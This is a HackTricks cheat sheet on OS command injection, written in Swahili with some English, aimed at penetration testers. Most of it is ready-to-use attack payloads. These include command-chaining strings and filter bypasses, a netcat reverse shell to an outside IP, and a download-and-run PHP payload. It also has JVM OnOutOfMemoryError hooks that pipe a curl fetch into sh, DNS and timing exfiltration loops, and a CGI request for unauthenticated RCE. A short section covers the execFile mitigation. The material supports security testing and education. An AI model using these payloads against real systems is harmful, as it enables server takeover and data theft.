Command Injection

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

command Injection ni nini?

A command injection inaruhusu utekelezaji wa amri zozote za mfumo wa uendeshaji na mshambuliaji kwenye seva inayohifadhi programu. Kwa hivyo, programu na data zake zote zinaweza kuathiriwa kabisa. Utekelezaji wa amri hizi kawaida humruhusu mshambuliaji kupata ufikiaji usioidhinishwa au udhibiti wa mazingira ya programu na mfumo ulio chini yake.

Muktadha

Kulingana na mahali ambapo ingizo lako linaingizwa unaweza kuhitaji kumaliza muktadha uliowekwa ndani ya nukuu (kwa kutumia " au ') kabla ya amri.

Command Injection/Execution

#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id #  Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)
ls%0abash%09-c%09"id"%0a   # (Combining new lines and tabs)

#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful

#Not executed but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command

Limition Bypasses

Ikiwa unajaribu kutekeleza arbitrary commands inside a linux machine utapenda kusoma kuhusu hizi Bypasses:

Bypass Linux Restrictions

Mifano

vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay

Vigezo

Hapa kuna vigezo 25 muhimu vinavyoweza kuwa hatarini kwa code injection na udhaifu mwingine wa RCE (kutoka link):

?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

Time based data exfiltration

Kutoa data: herufi kwa herufi

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real    0m5.007s
user    0m0.000s
sys 0m0.000s

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real    0m0.002s
user    0m0.000s
sys 0m0.000s

DNS based data exfiltration

Inatokana na zana kutoka kwa https://github.com/HoLyVieR/dnsbin, ambayo pia inapatikana kwenye dnsbin.zhack.ca

1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done

$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)

Vifaa vya mtandaoni vya kukagua DNS based data exfiltration:

  • dnsbin.zhack.ca
  • pingb.in

Kupita vichujio

Windows

powershell C:**2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:**32\c*?c.e?e # calc

Linux

Bypass Linux Restrictions

Node.js child_process.exec vs execFile

Unapokagua back-end za JavaScript/TypeScript mara nyingi utakutana na API ya Node.js child_process.

// Vulnerable: user-controlled variables interpolated inside a template string
const { exec } = require('child_process');
exec(`/usr/bin/do-something --id_user ${id_user} --payload '${JSON.stringify(payload)}'`, (err, stdout) => {
/* … */
});

exec() inazindua shell (/bin/sh -c), kwa hivyo alama yoyote yenye maana maalum kwa shell (back-ticks, ;, &&, |, $(), …) itasababisha command injection wakati pembejeo za mtumiaji zinapoambatishwa ndani ya string.

Kupunguza hatari: tumia execFile() (au spawn() bila chaguo la shell) na toa kila kigezo kama kipengele tofauti cha array ili hakuna shell itakayohusika:

const { execFile } = require('child_process');
execFile('/usr/bin/do-something', [
'--id_user', id_user,
'--payload', JSON.stringify(payload)
]);

Real-world case: Synology Photos ≤ 1.7.0-0794 ilitumika kupitia tukio la WebSocket lisilo na uthibitisho ambalo liliweka data inayoendeshwa na mshambuliaji ndani ya id_user ambayo baadaye ilingizwa ndani ya wito exec(), ikipata RCE (Pwn2Own Ireland 2024).

Argument/Option injection via leading hyphen (argv, no shell metacharacters)

Si kila injection inahitaji shell metacharacters. Ikiwa application inapitia string zisizoaminika kama arguments kwa system utility (hata kwa execve/execFile na bila shell), programu nyingi bado zitafasiri argument yoyote inaanza na - au -- kama option. Hii inamruhusu mshambuliaji kubadili mode, kubadilisha njia za output, au kusababisha mienendo hatari bila hata kuingia kwenye shell.

Typical places where this appears:

  • Embedded web UIs/CGI handlers ambazo zinajenga amri kama ping <user>, tcpdump -i <iface> -w <file>, curl <url>, n.k.
  • Centralized CGI routers (mfano, /cgi-bin/<something>.cgi na parameter ya selector kama topicurl=<handler>) ambapo handlers nyingi zinatumia validator dhaifu ile ile.

What to try:

  • Toa values zinazoanza na -/-- ili zichukuliwe kama flags na tool ya downstream.
  • Abuse flags ambazo zinabadilisha tabia au kuandika files, kwa mfano:
  • ping: -f/-c 100000 kuipigia device msongamano (DoS)
  • curl: -o /tmp/x kuandika paths yoyote, -K <url> kupakia config inayoendeshwa na mshambuliaji
  • tcpdump: -G 1 -W 1 -z /path/script.sh kupata post-rotate execution katika wrappers zisizo salama
  • Ikiwa programu inaunga mkono -- end-of-options, jaribu kuruka mitigations mbumbuvu ambazo zinabandika -- mahali pasipo sahihi.

Miundo ya Generic PoC dhidi ya centralized CGI dispatchers:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded

# Flip options in a downstream tool via argv injection
topicurl=<handler>&param=-n

# Unauthenticated RCE when a handler concatenates into a shell
topicurl=setEasyMeshAgentCfg&agentName=;id;

Callback za utambuzi za JVM kwa utekelezaji uliodhamiriwa

Kila primitive inayokuwezesha kuingiza argument za mstari wa amri za JVM (_JAVA_OPTIONS, launcher config files, AdditionalJavaArguments fields in desktop agents, etc.) inaweza kubadilishwa kuwa RCE ya kuaminika bila kugusa bytecode ya programu:

  1. Lazimisha crash inayotabirika kwa kupunguza metaspace au heap: -XX:MaxMetaspaceSize=16m (au -Xmx ndogo). Hii inahakikisha OutOfMemoryError hata wakati wa bootstrap ya mapema.
  2. Unganisha hook ya makosa: -XX:OnOutOfMemoryError="<cmd>" au -XX:OnError="<cmd>" itaendesha amri yoyote ya OS kila JVM inapokataa.
  3. Kwa hiari, ongeza -XX:+CrashOnOutOfMemoryError ili kuepuka jaribio za kurejesha na kufanya payload iwe ya mara moja.

Example payloads:

-XX:MaxMetaspaceSize=16m -XX:OnOutOfMemoryError="cmd.exe /c powershell -nop -w hidden -EncodedCommand <blob>"
-XX:MaxMetaspaceSize=12m -XX:OnOutOfMemoryError="/bin/sh -c 'curl -fsS https://attacker/p.sh | sh'"

Kwa kuwa uchunguzi huu unachambuliwa na JVM yenyewe, hakuna shell metacharacters zinazohitajika, na amri inaendeshwa kwa kiwango sawa cha uadilifu kama launcher. Desktop IPC bugs zinazotuma JVM flags zilizotolewa na mtumiaji (see Localhost WebSocket abuse) kwa hivyo zinatafsiriwa moja kwa moja kuwa OS command execution.

Brute-Force Detection List

Auto_Wordlists/wordlists/command_injection.txt at main \xc2\xb7 carlospolop/Auto_Wordlists \xc2\xb7 GitHub

Marejeo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks